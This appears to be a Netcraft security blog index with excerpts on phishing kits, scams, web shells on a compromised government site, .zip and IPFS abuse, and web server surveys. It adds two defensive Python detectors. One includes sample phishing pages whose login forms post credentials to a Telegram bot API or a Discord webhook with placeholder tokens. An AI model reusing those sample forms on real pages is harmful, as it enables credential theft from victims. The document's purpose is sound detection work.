PHP-less phishing kits that can run on any website

Criminals can now deploy phishing sites on any type of web server, even when commonly used server-side technologies such as PHP are not supported.

Phishing kits are predominantly implemented in PHP, as this provides the server-side functionality required to store and transmit stolen credentials without publicly revealing where they are being sent.

PHP is a widely used platform and is often supported on low-cost or compromised hosting platforms. Consequently, very few phishing kits are implemented in any other server-side language. For example, only a very small number of phishing kits have even been written in ASP.NET to run on Microsoft web servers.

An example of a typical phishing kit. It contains server-side PHP scripts, plus other resources such as fonts, stylesheets, and client-side JavaScript files.

We also see relatively small numbers of kits that do not contain any server-side scripts but do still rely on a PHP script to ultimately process their stolen data. These kits use static HTML pages to impersonate the targeted organisation, with web forms that submit stolen credentials directly from the victim’s browser to a PHP script hosted on a central remote “dropsite”. The PHP script then logs or forwards the stolen credentials to the criminal, typically via email, Telegram or Discord.

However, some recent phishing kits have gone one step further and eliminated the need for PHP scripts anywhere along the chain, thus eliminating a single point of failure that is inherent when hosting your own dropsite.

An example of a PHP-less phishing kit. It contains only images and static HTML pages which submit stolen credentials directly from the victim’s browser to a Telegram chat.

These new kits expand the range of hosting options open to the phisher, as they can be deployed on any static content hosting platform, regardless of what operating system it’s …

Continue reading PHP-less phishing kits that can run on any website
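One way to spot the exfiltration pattern described above during triage of a suspected phishing page, as an added example (it is not Netcraft's code and is not taken from any real kit): parse a static HTML page, collect every form action and inline script, and flag any that point at a chat-service API that a browser-submitted login form has no legitimate reason to post to. The indicator list, the credential field names and the three sample pages are constructed for this example; the URL shapes for Telegram's bot API and Discord webhooks are the publicly documented ones, with placeholder tokens.

```python
"""Flag static HTML that sends form data straight to a chat-service API.

Added example, not code from the original post or from any phishing kit.
The indicator patterns, credential field names and sample pages below are
constructed assumptions for illustration.
"""
import re
from html.parser import HTMLParser

# Destinations a static login page should never post browser data to
# (constructed indicator list; extend with other known exfiltration endpoints).
EXFIL_PATTERNS = [
    ("telegram_bot_api",
     re.compile(r"https?://api\.telegram\.org/bot[^/\s\"']+/", re.I)),
    ("discord_webhook",
     re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/", re.I)),
]

# Input names that indicate the form collects secrets (constructed list).
CREDENTIAL_FIELDS = {"password", "passwd", "pass", "pwd", "otp", "cvv", "cardnumber"}


class FormCollector(HTMLParser):
    """Collect form actions, their input names, and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "fields": [lower-cased names]}]
        self.scripts = []      # inline script bodies, one string each
        self._buf = []         # accumulates data chunks inside a <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("name") or "").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append("".join(self._buf))
            self._buf = []
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def analyse_page(html):
    """Return a list of findings; an empty list means no exfil indicator matched.

    Each finding records which indicator hit, where in the page, and (for
    forms) whether the form also collects credential-looking fields.
    """
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for i, form in enumerate(parser.forms):
        for label, rx in EXFIL_PATTERNS:
            if rx.search(form["action"]):
                findings.append({
                    "indicator": label,
                    "where": f"form[{i}].action",
                    "collects_credentials": bool(set(form["fields"]) & CREDENTIAL_FIELDS),
                })
    for i, body in enumerate(parser.scripts):
        for label, rx in EXFIL_PATTERNS:
            if rx.search(body):
                findings.append({"indicator": label, "where": f"script[{i}]",
                                 "collects_credentials": None})
    return findings


def is_suspicious(html):
    """Convenience verdict for a triage pipeline."""
    return bool(analyse_page(html))


# Constructed sample pages (placeholder tokens, not real endpoints).
SAMPLE_KIT_FORM = """<html><body>
<form method="post" action="https://api.telegram.org/botPLACEHOLDER_TOKEN/sendMessage">
  <input name="email"><input name="password" type="password">
  <button>Sign in</button>
</form></body></html>"""

SAMPLE_KIT_SCRIPT = """<html><body>
<form action="#"><input name="user"><input name="password" type="password"></form>
<script>var hook = "https://discord.com/api/webhooks/PLACEHOLDER_ID/PLACEHOLDER_TOKEN";</script>
</body></html>"""

SAMPLE_BENIGN = """<html><body>
<form method="post" action="/login"><input name="user"><input name="password"></form>
<script>document.title = "Sign in";</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in [("kit-form", SAMPLE_KIT_FORM), ("kit-script", SAMPLE_KIT_SCRIPT),
                       ("benign", SAMPLE_BENIGN)]:
        print(name, analyse_page(page))
```

Because the page is static, this check needs no server-side execution: it can run over the fetched HTML in a crawler or mail gateway, and the `collects_credentials` flag separates a login form that posts to a chat API (high confidence) from a page that merely mentions such a URL in a script.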

January 2024 Web Server Survey

In the January 2024 survey we received responses from 1,079,154,539 sites across 270,447,456 domains and 12,337,710 web-facing computers. This reflects a loss of 8.9 million sites, a gain of 1.2 million domains, and a loss of 17,900 web-facing computers.

nginx saw the largest increase of 5.6 million sites (+2.29%) this month. Its market share now stands at 23.21% (+0.71pp). Cloudflare and OpenResty also experienced strong growth this month, gaining 5.1 million (+4.52%) and 3.7 million sites (+3.86%) respectively.

Apache saw the largest loss of 24.8 million sites (-9.98%), reducing its market share to 20.70% (-2.11pp). LiteSpeed lost 1.2 million sites (-2.25%), slightly reducing its market share by 0.07pp to 4.63%.

Vendor news

Total number of websites
Web server market share
Developer December 2023 Percent January 2024 Percent Change
nginx 244,903,710 22.51% 250,509,224 23.21% 0.71
Apache 248,118,087 22.80% 223,346,407 20.70% -2.11
Cloudflare 113,499,479 10.43% 118,627,424 10.99% 0.56
OpenResty 94,737,403 8.71% 98,390,136 9.12% 0.41

Web server market share for active sites
Developer December 2023 Percent January 2024 Percent Change
Apache 39,476,338 20.84% 39,401,334 20.48% -0.36
nginx 36,176,461 19.10% 35,591,558 18.50% -0.60
Cloudflare 23,076,699 12.18% 25,731,404 13.38% 1.19
Google 20,543,756 10.85% 20,010,860 10.40% -0.44

For more information see Active Sites.

Web server market share for top million busiest sites
Developer December 2023 Percent January 2024 Percent Change
Cloudflare 223,795 22.38% 224,091 22.41% 0.03
nginx 207,158 20.72% 207,074 20.71% -0.01
Apache 203,097 20.31% 202,256 20.23% -0.08
Microsoft 47,476 4.75% 46,995 4.70% -0.05
Web server market share for computers
Developer December 2023 Percent January 2024 Percent Change
nginx 4,867,232 39.39% 4,856,088 39.36% -0.03
Apache 3,183,227 25.76%

Continue reading January 2024 Web Server Survey

New Year, New Scams – Health product scam campaigns abusing cheap TLDs

In recent months, we’ve noticed an increased number of high-volume health product campaigns that exploit cheap top-level domains (TLDs), reaching up to 60% of a TLD’s daily domain registrations.

This blog looks at current trends around health product scams and examines some of the TLDs providing domain names for these large campaigns.  

Dragons’ Dens and Shark Tanks

Health product scams frequently take the form of fake news articles, often impersonating specific newspapers and featuring celebrity endorsements from well-known media figures who have supposedly used the products that are targeted. In this sense, they are similar to the cryptocurrency investment scams we’ve blogged about previously.

Recent scams impersonate organizations such as Fox News, the Daily Mail, The Today Show, and the New York Times, with the latest campaign of health product scams centered around products backed by the judges from the popular TV series Shark Tank (in the US) or Dragons’ Den (in the UK).

A screenshot of a website claiming to be supported by Shark Tank

These articles then use affiliate links to direct users to landing pages that sell products, especially weight loss gummies that purport to induce ketosis, but also other products such as skincare creams, erectile dysfunction supplements, and teeth whitening kits.  

The products (and even the landing pages selling them) may be legal. Still, fake news articles that lure victims to these sites frequently misrepresent the product with false claims and often profit from affiliate marketing. In fact, in the US, the Federal Trade Commission released a consumer warning following the Shark Tank campaigns, which leads with the headline ‘Did your favorite Shark Tank celebrity really endorse THAT? Probably not.’

We often see these types of scams advertised on social media platforms such as Facebook, where accounts have been compromised using credentials captured by a phishing website, similar to how LinusTechTips was

Continue reading New Year, New Scams – Health product scam campaigns abusing cheap TLDs

“Quishing” you a Happy Holiday Season

QR Code phishing scams — What they are and how to avoid them.

Originally invented to keep track of car parts in the early 90s, QR codes have been around for decades. After gaining broader acceptance during the COVID-19 pandemic, they are now—perhaps inevitably—being exploited by cybercriminals. Quishing, or QR Code phishing, exploits smartphone users scanning the 2D barcode, which leads to a phishing site, malicious link, or another cyber attack.

We’ll look at the threat from QR code-based phishing and consider why cybercriminals are adopting this technique. Additionally, we’ll explore opportunities to detect and disrupt these attacks at scale.

QR codes in phishing emails: what’s the threat?

QR codes work in exactly the same way as malicious links: a victim who scans the QR code – typically using their smartphone – will be directed to a malicious site. From there, the deception can continue as with any other phishing campaign.

By now, many know how to spot suspicious-looking links in phishing emails that mimic official communications from established brands or institutions. The opposite is true with QR codes: there is typically no user-accessible way to check the destination before scanning.

From a cybercriminal’s perspective, there are several reasons to use QR codes for phishing, often dubbed quishing, including:

  1. Hiding URLs from users – QR codes provide criminals with a very effective mechanism for hiding suspicious URLs, making this an ideal way to bypass growing user skepticism concerning clicking questionable and shortened URLs.  
  2. Circumventing corporate controls – If users receive a QR-based phishing email on their work computer, they will likely scan the code using their phone. Cybercriminals know personal devices may have less built-in security than a company computer or phone. It’s a subtle way of encouraging victims to use devices not under corporate control and are, therefore, less likely to

Continue reading “Quishing” you a Happy Holiday Season

December 2023 Web Server Survey

In the December 2023 survey we received responses from 1,088,057,023 sites across 269,268,434 domains and 12,355,610 web-facing computers. This reflects a loss of 4.1 million sites, an increase of 238,593 domains, and a loss of 128,028 web-facing computers.

nginx experienced the largest loss of 4.5 million sites (-1.79%) this month, and now accounts for 22.5% of sites seen by Netcraft. Microsoft suffered the next largest loss, down by 2.5 million sites (-9.65%).

OpenResty remains the largest growing vendor, gaining 3.3 million sites (+3.64%) and increasing its market share to 8.71%. Second to OpenResty is Google, which gained 1.5 million sites (+2.65%).

Vendor news

  • Apache Tomcat versions 9.0.83, 10.1.16, 11.0.0-M14, and 8.5.96 were released.
  • OpenResty version 1.21.4.3 was released, patching a bug that made it vulnerable to HTTP/2 rapid reset attacks.
  • AWS held its annual re:Invent conference, with announcements including:
Total number of websites
Web server market share
Developer November 2023 Percent December 2023 Percent Change
Apache 248,343,154 22.74% 248,118,087 22.80% 0.06
nginx 249,368,944 22.83% 244,903,710 22.51% -0.32
Cloudflare 115,937,937 10.62% 113,499,479 10.43% -0.18
OpenResty 91,405,835 8.37% 94,737,403 8.71% 0.34

Web server market share for active sites
Developer November 2023 Percent December 2023 Percent Change
Apache 40,080,759 20.98% 39,476,338 20.84% -0.14
nginx 36,927,632 19.33% 36,176,461 19.10% -0.23
Cloudflare 23,035,498 12.06% 23,076,699 12.18% 0.12
Google 20,759,419 10.87% 20,543,756 10.85% -0.02

For more information see Active Sites.

Web server market share for top million busiest sites
Developer November 2023 Percent December 2023 Percent Change
Cloudflare 222,400 22.24% 223,795 22.38% 0.14
nginx 206,286 20.63% 207,158 20.72% 0.09
Apache 204,504 20.45% 203,097 20.31% -0.14
Microsoft 48,019 4.80% 47,476 4.75% -0.05
Web server market share for computers
Developer November 2023 Percent December 2023 Percent Change
nginx 4,904,964 39.29% 4,867,232 39.39% 0.10
Apache 3,212,874 25.74% 3,183,227 25.76% 0.03
Microsoft 1,205,605

Continue reading December 2023 Web Server Survey

It’s not cricket! Sri Lanka and Bangladesh co-host phishing attack

Sri Lanka and Bangladesh have a successful history of co-hosting the Cricket World Cup, but today the two countries’ governments have found themselves on a sticky wicket by co-hosting a phishing attack that targets UK banking customers.

Victims lured to a certain page on the Lanka Government Network website at lgn2.gov.lk will be swiftly redirected to a phishing site hosted by the Rajshahi Metropolitan Police in Bangladesh (rmp.gov.bd).

The phishing site hosted on a Bangladesh Police website.

It is unlikely that either government is consciously hosting a phishing attack in unison like this, especially on a website belonging to a police force – although this should certainly make the crime easier to investigate.

Many phishing sites and other web-based types of cybercrime are hosted on compromised servers, and that looks likely to be the case in this instance. Last month, the homepage of lgn2.gov.lk was defaced by a group identifying itself as Cyb3r Drag0nz, indicating that they had gained unauthorised access to the web server.

Things seem to have spiralled out of control ever since. The Lanka Government Network website is now heavily compromised and currently hosts multiple web shells in addition to being involved in this phishing attack.

The PHP web shells hosted on lgn2.gov.lk include variants of the mini shell, including 1337 3YP455 and CasperSecurity. These allow files to be uploaded to the web server, which may have been how the phishing content – and other web shells – have been placed on the site.

Other web shells found on the Lanka Government Network site include variants of the WSO web shell (such as YANZ bypass and V3n0m), which let attackers run arbitrary commands on the web server, manage files, and carry out attacks against other servers.

The LGN website promotes a secure government network for Sri

Continue reading It’s not cricket! Sri Lanka and Bangladesh co-host phishing attack

.zip TLD: six months on, and still rollin’

It has been six months since Netcraft first reported on abuse of the new .zip TLD, outlining the fraudulent activity we detected and blocked. Within weeks of its launch, Netcraft had detected many fresh .zip domain registrations designed to exploit confusion between the new TLD and the .zip file extension for ZIP archives.

So, what has changed in the last 6 months? Not much, it seems.

.zip registrations

The rate of new .zip domain registrations has declined since our previous blog post. Despite this, there are now:

  • 16,705 registered .zip domains (a threefold increase since our previous post) 
  • 8,432 .zip domains with A records in total (a fourfold increase) 
  • 4,421 .zip domains with MX records in total, only 619 of which don’t also have A records 
  • 4,196 distinct IP addresses for .zip domains in total (a fivefold increase)
  • 417 .zip domain names that mention ‘installer’ or ‘update’ (a twofold increase) 

Out of these domains, we discovered 5 serving zip bombs. In addition, the larger number of distinct IP addresses (1 for every 4 domains now, compared to 1 for every 6 domains six months ago) suggests that .zip domains are becoming more diverse.

Malicious websites

Netcraft has blocked 50 malicious .zip domains since the previous post on 17 May 2023, bringing the total to 56. These domains mostly impersonate Microsoft, Google, and Steam, as the following figure illustrates:

Other notable attacks include:

  1. Apecoin[.]zip, first seen on 9th August 2023, is a crypto drainer scam impersonating a cryptocurrency platform. It purports to add cryptocurrency to a user’s wallet, but once authorisation is given it instead transfers all of their assets (cryptocurrency, NFTs, etc.) to the criminals operating the site. This same technique is being used by criminals exploiting people’s generosity around the Gaza conflict.

  2. Sledgehammer[.]zip, first seen

Continue reading .zip TLD: six months on, and still rollin’

November 2023 Web Server Survey

In the November 2023 survey we received responses from 1,092,141,942 sites across 269,029,841 domains and 12,483,638 web-facing computers. This reflects a loss of 1.2 million sites, a gain of 1.1 million domains, and a gain of 112,102 web-facing computers.

OpenResty saw the largest gain of 2.4 million sites this month. This gave it a slight increase in market share from 8.14% to 8.37% (+0.23pp). Its market share has remained stable between 7.7% and 8.7% since February 2022.

Meanwhile, nginx suffered the largest loss of 4.5 million sites this month, meaning it now accounts for 22.83% of the market. This continues the decline observed in recent years, with its market share now down 13.71pp since July 2021.

Hosting providers

This month also saw the full effects of Squarespace’s acquisition of Google Domains, which closed on 7th September 2023 after the acquisition was first announced in June 2023. Over 25 million sites, primarily parked domains, moved from Google to Amazon this month – a 20% increase in the number of sites hosted by Amazon.

We also observed sites switching away from DediPath, which abruptly announced its closure on 31st August 2023. Following on from a smaller decline of 10% last month, there was a further exodus this month, with 85% of the remaining 5,403 sites leaving the hosting provider: 34% of these sites switched to Tencent, and 43% were shut down altogether. DediPath’s computer count decreased a further 61%, leaving the company with just 628 web-facing computers. DediPath continues to urge its customers to back up their data and migrate away as soon as possible.

Total number of websites
Web server market share
Developer October 2023 Percent November 2023 Percent Change
nginx 253,876,735 23.22% 249,368,944 22.83% -0.39
Apache 249,833,078 22.85% 248,343,154 22.74% -0.11
Cloudflare 116,314,628 10.64% 115,937,937 10.62% -0.02
OpenResty 88,981,001 8.14% 91,405,835 8.37% 0.23

Web server market share for active sites
Developer October 2023

Continue reading November 2023 Web Server Survey

Fake Online Stores See A 135% Spike As Black Friday And Holiday Shopping Approaches

As Black Friday (and Cyber Monday) approaches, the annual online sales phenomenon shows no sign of slowing down, and neither do cybercriminals looking to take advantage of the busiest shopping days of the year.

The kick-off to holiday shopping, much of which has become digital, represents a massive opportunity for cybercriminals seeking to exploit the surge in online activity. Shoppers are primed to expect hard-to-believe online bargains that they might be more suspicious of outside Black Friday/Cyber Monday. 

As of the end of October 2023, Netcraft’s research has identified a staggering 135% increase in fake retail sites blocked compared to October last year, on top of a 63% increase over the year before that, meaning the annual rate of increase has more than doubled in the last 12 months on top of already alarming growth.

In this review, we’ll look at prominent fake retail sites identified by Netcraft and the techniques cybercriminals use to trick users and ultimately impact brand credibility and reputation. 

Fake shops exploiting Black Friday

Claiming to offer highly discounted goods, fake online shops either impersonate the websites of luxury brands and established retailers or operate across multiple brands. These properties are often a front to capture payment details (and other sensitive information). The details shoppers submit can be used directly or sold to other cybercriminals. Any goods that end up being delivered – many are not – are likely to be counterfeit.

With so many genuine sites offering significant discounts on actual products, it’s easy to see why cybercriminals exploit Black Friday and Cyber Monday themes. Here are a few examples of fake retail sites we’ve detected, starting with a site that targets US home improvement retailer Lowe’s.

Screenshot of fake Lowe's shop

Figure 1: Fake shop with ‘Black Friday’ promotion, targeting US retailer Lowe’s.

As expected, cybercriminals change their tactics to coincide …

Continue reading Fake Online Stores See A 135% Spike As Black Friday And Holiday Shopping Approaches

Disrupting IPFS phishing attacks

The InterPlanetary File System (IPFS) is a content-addressed peer-to-peer file sharing network from Protocol Labs being exploited by cybercriminals to host phishing sites and other malicious content. Often associated with the web 3.0 movement, it allows its users to upload, share, and download files across a distributed worldwide network.

Gateways make IPFS accessible to the broader public, allowing pages powered by IPFS to be visited in traditional web browsers and shared with potential victims. Netcraft first detected cyber attacks using IPFS in 2016, and now detects and blocks hundreds of attacks using IPFS gateways every day.

This blog post describes what IPFS is and how it works, how and why it is used by cybercriminals, and what Netcraft is doing to block and disrupt attacks that leverage the IPFS network.

What is IPFS?

IPFS is a decentralized storage and delivery network technology. Unlike the traditional web, where most content is hosted on dedicated servers, IPFS is peer-to-peer, which means there is no single server providing each page. Instead, content is accessed via any peer (also known as a node) that has a copy of the content, with little distinction between servers and users.

A diagram comparing a peer-to-peer network, where each node links to other nodes, with an HTTP(S)-based network, where client nodes connect directly to a single server node.

The decentralized structure allows users to host or share content with increased availability and resilience. Filecoin, a cryptocurrency which builds upon IPFS to incentivize node operators to host content, is significantly cheaper than using cloud storage services like Amazon S3 at the time of writing. Eliminating the need for a single server also means content can be accessed from nodes hosted in a wide variety of locations in multiple jurisdictions—improving availability but making it more difficult to remove content.

How does IPFS manage content?

The traditional web is location-addressed: URLs, such as https://www.netcraft.com/, are used to access content from a specific location. IPFS is instead content-addressed. …

Continue reading Disrupting IPFS phishing attacks
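The practical consequence of content addressing for defenders, which the excerpt above leads up to, is that the same phishing page can be reached through any public gateway, so a block decision is better keyed on the content identifier (CID) than on one gateway URL. The following added example (not Netcraft's code, and not the IPFS project's) normalises the two common gateway URL shapes, path style `https://<gateway>/ipfs/<cid>/...` and subdomain style `https://<cid>.ipfs.<gateway>/...`, to the CID they serve and groups sightings by CID. The gateway host names and the CID values are constructed (shaped like a CIDv0 and a base32 CIDv1, but not real content); the two URL shapes are the ones public gateways document.

```python
"""Normalise IPFS gateway URLs to the CID they serve and group sightings by CID.

Added example, not code from the original post or the IPFS project. Gateway
names and CIDs below are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# CIDv0 is "Qm" followed by 44 base58btc characters (sha2-256 multihash).
# CIDv1 as served by gateways is lowercase base32 with multibase prefix "b";
# the length bound is a loose sanity check, not a full multiformats decoder.
_B58 = "[1-9A-HJ-NP-Za-km-z]"
CID_RE = re.compile(rf"^(?:Qm{_B58}{{44}}|b[a-z2-7]{{50,}})$")


def extract_cid(url):
    """Return (cid, gateway_host, path) for an IPFS gateway URL, else None.

    IPNS names and /ipfs/ paths whose second segment is not CID-shaped are
    rejected rather than guessed at.
    """
    parts = urlsplit(url)
    host = parts.hostname or ""          # already lower-cased by urlsplit
    segments = [s for s in parts.path.split("/") if s]

    # Path style: /ipfs/<cid>[/rest-of-path]
    if len(segments) >= 2 and segments[0].lower() == "ipfs" and CID_RE.match(segments[1]):
        return segments[1], host, "/" + "/".join(segments[2:])

    # Subdomain style: <cid>.ipfs.<gateway>; only case-insensitive (base32)
    # CIDs survive DNS, which is why gateways redirect CIDv0 to CIDv1 here.
    labels = host.split(".")
    if len(labels) >= 3 and labels[1] == "ipfs" and CID_RE.match(labels[0]):
        return labels[0], ".".join(labels[2:]), "/" + "/".join(segments)

    return None


def group_by_cid(urls):
    """Map each CID to the sorted list of distinct gateways it was seen on."""
    seen = {}
    for url in urls:
        hit = extract_cid(url)
        if hit is None:
            continue
        cid, gateway, _path = hit
        seen.setdefault(cid, set()).add(gateway)
    return {cid: sorted(gws) for cid, gws in seen.items()}


# Constructed sample data: CID-shaped strings and example gateway hosts.
SAMPLE_CID_V0 = "Qm" + "Demo58Text1" * 4            # 2 + 44 base58 chars
SAMPLE_CID_V1 = "bafybei" + "demo2cid" * 7          # lowercase base32 shape
SAMPLE_URLS = [
    f"https://gateway.example/ipfs/{SAMPLE_CID_V0}/login.html",
    f"https://{SAMPLE_CID_V1}.ipfs.other-gw.example/login.html",
    f"https://gateway.example/ipfs/{SAMPLE_CID_V1}/",
    "https://gateway.example/ipns/example-name/index.html",   # IPNS, not a CID
    "https://www.example/ipfs/not-a-cid/page",                # malformed
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url, "->", extract_cid(url))
    print(group_by_cid(SAMPLE_URLS))
```

Grouping by CID is what makes gateway-agnostic blocking possible: once a CID is classified as malicious, every gateway URL that resolves to it inherits the verdict, instead of each gateway mirror being treated as a fresh, unknown site.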